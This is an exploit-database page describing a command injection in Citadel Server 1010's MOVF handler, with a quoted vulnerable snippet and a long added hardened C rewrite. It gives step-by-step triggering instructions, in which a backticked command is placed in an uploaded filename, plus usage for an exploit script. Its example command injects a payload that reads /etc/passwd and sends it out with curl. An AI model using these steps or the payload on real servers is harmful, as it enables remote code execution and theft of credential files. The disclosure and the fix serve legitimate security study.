## https://sploitus.com/exploit?id=F4645DE9-EDF0-5CC3-AECD-AB65D2F89D27
## Citadel Server Command Injection Vulnerability
Author: Augustus
Description: This script exploits a command injection vulnerability in the Citadel Server leading to RCE.
Tested on: Citadel Server 1010
### Prerequisites:
- Citadel server port (default: 504) exposed.
- An account with admin privileges to edit room settings. (May not be required if two directory rooms with the correct permissions already exist.)
- At least one of the rooms needs to allow uploads.
### To trigger the exploit:
- Create 2 directory rooms. At least one of which needs to allow uploads.
- Upload a file to one of the rooms. The filename is the command to execute, enclosed in backticks, or whatever other command injection technique you want.
- Move the file to the other room with the `MOVF` command through port 504. This triggers the command injection.
### Vulnerability
The function `cmd_movf` in `serv_file.c` is vulnerable to a command injection attack. Unsanitized user input is concatenated into a shell command string, which is then executed with `system()`. The parameters `CC->room.QRdirname`, `filename` and `qrbuf.QRdirname` are all controlled by the user.
```c
<...>
/* All three %s arguments are user-controlled; none are validated or quoted. */
snprintf(buf, sizeof buf, "cat ./files/%s/filedir |grep \"%s\" >>./files/%s/filedir",
         CC->room.QRdirname, filename, qrbuf.QRdirname);
/* The assembled string is handed to a shell, so metacharacters in any of the three values are interpreted. */
system(buf);
cprintf("%d File '%s' has been moved.\n", CIT_OK, filename);
```
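The root cause is that a shell is involved at all. The following is an added example, not Citadel's own code, showing the same "copy the matching filedir lines from one room to another" operation done in-process, with the three user-controlled names validated first. The function names (`is_safe_path_component`, `append_matching_lines`, `movf_hardened`, `demo_append`) and the `[A-Za-z0-9._-]` allowlist are assumptions made for this example; the `./files/<room>/filedir` layout is the one shown in the vulnerable snippet.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>

/* Hardened rewrite (added example, not Citadel's own code).
 * Rather than building a shell command with snprintf() and passing it to
 * system(), the source room's filedir is read line by line and the lines
 * mentioning the file are appended to the destination room's filedir.
 * No shell ever sees the room directory names or the filename, so
 * metacharacters in them cannot become commands. */

/* Return 1 if `name` is safe as a single path component: non-empty,
 * not "." or "..", and only [A-Za-z0-9._-]. The allowlist is an
 * assumption for this example; match it to what the server really permits. */
int is_safe_path_component(const char *name) {
    size_t len;
    if (name == NULL) return 0;
    len = strlen(name);
    if (len == 0 || len > 255) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/* Append every line of src_filedir containing `filename` to dst_filedir.
 * In-process equivalent of `cat src | grep -F filename >> dst`.
 * Returns the number of lines copied, or -1 on I/O error. */
int append_matching_lines(const char *src_filedir, const char *dst_filedir,
                          const char *filename) {
    FILE *in = fopen(src_filedir, "r");
    if (in == NULL) return -1;
    FILE *out = fopen(dst_filedir, "a");
    if (out == NULL) { fclose(in); return -1; }
    char line[4096];
    int copied = 0;
    while (fgets(line, sizeof line, in) != NULL) {
        if (strstr(line, filename) != NULL) {
            if (fputs(line, out) == EOF) { copied = -1; break; }
            copied++;
        }
    }
    fclose(in);
    fclose(out);
    return copied;
}

/* Hardened counterpart of the vulnerable block in cmd_movf(): validate the
 * three user-controlled names, then do the work without a shell.
 * Returns 0 on success, -1 if any name is rejected, -2 on I/O error. */
int movf_hardened(const char *src_room, const char *dst_room, const char *filename) {
    char src_path[512], dst_path[512];
    if (!is_safe_path_component(src_room) ||
        !is_safe_path_component(dst_room) ||
        !is_safe_path_component(filename)) {
        return -1;
    }
    snprintf(src_path, sizeof src_path, "./files/%s/filedir", src_room);
    snprintf(dst_path, sizeof dst_path, "./files/%s/filedir", dst_room);
    return append_matching_lines(src_path, dst_path, filename) < 0 ? -2 : 0;
}

/* Self-check on constructed data: writes a temporary source filedir with
 * three entries, copies the ones mentioning "report.txt" into a temporary
 * destination filedir and returns how many lines were copied. */
int demo_append(void) {
    char src[] = "/tmp/filedir_src_XXXXXX";
    char dst[] = "/tmp/filedir_dst_XXXXXX";
    int fd_src = mkstemp(src);
    int fd_dst = mkstemp(dst);
    if (fd_src < 0 || fd_dst < 0) return -1;
    const char *constructed =           /* constructed sample filedir content */
        "report.txt 1024 quarterly report\n"
        "notes.md 200 meeting notes\n"
        "report.txt.sig 96 signature for report.txt\n";
    if (write(fd_src, constructed, strlen(constructed)) < 0) return -1;
    close(fd_src);
    close(fd_dst);
    int copied = append_matching_lines(src, dst, "report.txt");
    unlink(src);
    unlink(dst);
    return copied;   /* 2: both lines that mention report.txt */
}

int main(void) {
    printf("validate \"lobby\": %d\n", is_safe_path_component("lobby"));
    printf("validate \"`id`\": %d\n", is_safe_path_component("`id`"));
    printf("movf with backtick filename: %d\n", movf_hardened("room1", "room2", "`id`"));
    printf("lines copied in demo: %d\n", demo_append());
    return 0;
}
```

Two design points: `strstr` gives fixed-string matching, so a filename containing regex metacharacters is matched literally rather than interpreted as a `grep` pattern; and the allowlist check is applied to all three values, not only `filename`, because the vulnerable snippet shows the room directory names reaching the shell as well.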
### Usage
```
$ python3 exploit.py -h
usage: exploit.py [-h] --host HOST [--port PORT] --cmd CMD [--username USERNAME] [--password PASSWORD]
Command injection exploit for Citadel Server 1010
options:
-h, --help show this help message and exit
--host HOST IP address of the remote host
--port PORT Port number of the Citadel messaging server
--cmd CMD Command to execute on the Citadel server
--username USERNAME Username (default: admin)
--password PASSWORD Password (default: citadel)
```
### Example
```sh
python3 exploit.py --host 127.0.0.1 --port 504 --cmd 'curl http://127.0.0.1:9001/ -d "`cat /etc/passwd`"'
```